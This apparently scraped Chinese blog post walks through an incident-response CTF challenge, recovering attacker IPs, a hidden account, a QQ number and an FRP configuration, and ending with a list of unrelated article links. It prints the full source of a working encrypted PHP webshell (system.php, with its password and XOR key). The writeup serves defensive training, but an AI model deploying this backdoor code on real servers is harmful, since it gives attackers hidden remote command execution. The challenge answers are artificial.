当前位置: 首页 > news >正文

应急响应web2

在解题前,请确保您已解的一下内容:

1.攻击者的IP地址(两个)?

2.攻击者的webshell文件名?

3.攻击者的webshell密码?

4.攻击者的QQ号?

5.攻击者的服务器伪IP地址?

6.攻击者的服务器端口?

7.攻击者是如何入侵的(选择题)?

8.攻击者的隐藏用户名?

一、两个ip地址

扫描出来是一个system.php文件

<?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i<strlen($D);$i++) { $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c; } return $D; } $pass='hack6618'; $payloadName='payload'; $key='7813d1590d28a7dd'; if (isset($_POST[$pass])){ $data=encode(base64_decode($_POST[$pass]),$key); if (isset($_SESSION[$payloadName])){ $payload=encode($_SESSION[$payloadName],$key); if (strpos($payload,"getBasicsInfo")===false){ $payload=encode($payload,$key); } eval($payload); echo substr(md5($pass.$key),0,16); echo base64_encode(encode(@run($data),$key)); echo substr(md5($pass.$key),16); }else{ if (strpos($data,"getBasicsInfo")!==false){ $_SESSION[$payloadName]=encode($data,$key); } } }

这段PHP代码是一个典型的Webshell后门程序,用于在受感染的服务器上执行远程命令。

然后我们分析日志。

日志路径C:\phpstudy_pro\Extensions\Apache2.4.39\logs

192.168.126.135

接下来我们分析windows的系统日志,使用APT-Hunter工具的powershell日志收集器自动收集日志信息,将得到的日志解压。

Powershell:

cd C:\你的路径\APT-Hunter-3.2

解除系统默认脚本执行限制(仅首次需要):

Set-ExecutionPolicy RemoteSigned # 弹出提示输入 Y 确认

一键自动采集命令:

.\windows-log-collector-full-v3-CSV.ps1

使用 APT-Hunter 主 Python 脚本自动分析这批日志:

python APT-Hunter.py -p C:\Users\Administrator\Desktop\logs\wineventlog -o Project1 -allreport -p:提供包含使用powershell日志收集器提取的日志的解压路径 -o:输出生成项目的名称

192.168.126.129

二、攻击者的webshell文件名?

system.php

三、攻击者的webshell密码?

hack6618

四、攻击者的QQ号?

Tecent files 腾讯文件(可能指的是QQ之类的)

攻击者的QQ号:777888999321

五、攻击者的服务器伪IP地址?

在隐藏用户的文件中搜集信息:

FileRecv为QQ的接收的文件夹,发现frp内网穿透工具

找到配置信息查看:

256.256.66.88

六、攻击者的服务器端口?

65536

七、攻击者是如何入侵的(选择题)?

查看ftp日志文件:

分析日志文件,查找后门system.php文件,发现正在进行爆破

八、攻击者的隐藏用户名?

hack887


成功

http://www.jsqmd.com/news/1075292/

相关文章:

  • Fresco:Facebook 出品的 Android 图片加载库,1.7 万 Star 不是白来的
  • 家用录歌人声降噪美化音乐编辑器工具盘点
  • OBS背景移除插件深度解析:基于ONNX Runtime的实时人像分割技术实战指南
  • 我们是如何管理多环境(开发、测试、生产)配置的?
  • 从规则引擎到大语言模型:NLP范式迁移的工程本质
  • 3分钟搞定Mac NTFS读写难题:Free-NTFS-for-Mac免费终极解决方案
  • 3步掌握League Toolkit:英雄联盟智能助手的完整实践指南
  • 直播切片批量投流:用易元AI规避暗水印同源检测风险
  • 10分钟掌握AI驱动测试自动化:Testsigma完整实践指南
  • 【OpenClaw】通过 Nanobot 源码学习架构---(10)Heartbeat
  • 为什么Free-NTFS-for-Mac是Mac用户解决NTFS读写的最佳方案?
  • Java反序列化漏洞实战:从JNDI注入到恶意服务器搭建
  • 必火AI数字人视频制作从零到一:平台选型、形象定制与批量生产全攻略
  • Bebas Neue字体完全指南:免费开源标题字体的5大核心优势与实战应用
  • 企业官方网站翻译:全球化沟通的专业基石
  • 3分钟快速配置:基于YOLOv5的智能象棋AI辅助系统终极指南
  • FModel实战宝典:3大核心场景解锁虚幻引擎游戏资源逆向分析
  • 采购数据战略不是项目,而是持续演进的生命周期
  • 3步搞定AI转PSD:矢量图层完整保留的终极方案
  • 郑州翻译公司 意大利语合同翻译难点
  • 手语语料征集与管理系统
  • AI起名被拒?揭秘大模型的语义雷区与破障四步法
  • Sunshine 2025版:构建终极低延迟游戏串流服务器的完整指南
  • Kotlin的sealed interface:结合密封类与接口的优势
  • 如何5分钟让通达信自动完成缠论分析:告别复杂手动画图的终极解决方案
  • SPT-AKI存档编辑器:免费开源的塔科夫离线版终极管理工具,告别重复刷级的烦恼
  • 5分钟掌握Windows防休眠工具:智能屏幕常亮解决方案完全指南
  • gcsfs:用本地文件系统的方式操作Google Cloud Storage
  • 2026年6月远程控制软件办公横评:ToDesk、向日葵、UU远程中,UU远程办公体验再度碾压!
  • 高通 node简介